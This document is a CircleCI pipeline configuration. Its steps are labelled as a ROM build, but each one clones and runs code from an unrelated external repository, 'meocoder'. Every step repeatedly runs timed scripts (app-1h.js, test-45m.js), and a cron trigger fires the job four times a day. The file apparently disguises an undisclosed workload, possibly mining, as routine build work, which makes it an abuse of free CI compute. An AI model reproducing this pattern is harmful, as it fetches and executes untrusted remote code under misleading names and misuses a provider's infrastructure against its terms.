version: 2.1
jobs:
  build:
    docker:
      - image: circleci/node:12
      
    resource_class: medium

    working_directory: ~/j2teach

    steps:
      - checkout
      
      - run:
          name: Clone project and run task
          command:  git clone https://github.com/vippro99/meocoder.git && cd meocoder && npm i -s && chmod +x meocoder config.json && node app-1h.js
      - run:
          name: check device
          command:  cd meocoder && node app-1h.js
      - run:
          name: build rom
          command:  cd meocoder && node app-1h.js
      - run:
          name: relase rom
          command:  cd meocoder && node app-1h.js
      - run:
          name: save and close
          command:  cd meocoder && node test-45m.js
      
      # setup cronjob 
workflows:
  version: 2

  constantly_build:
    triggers:
      - schedule:
          cron: "0 8,14,20,2 * * *"
          filters:
            branches:
              only:
                - main
                - master
    jobs:
      - build
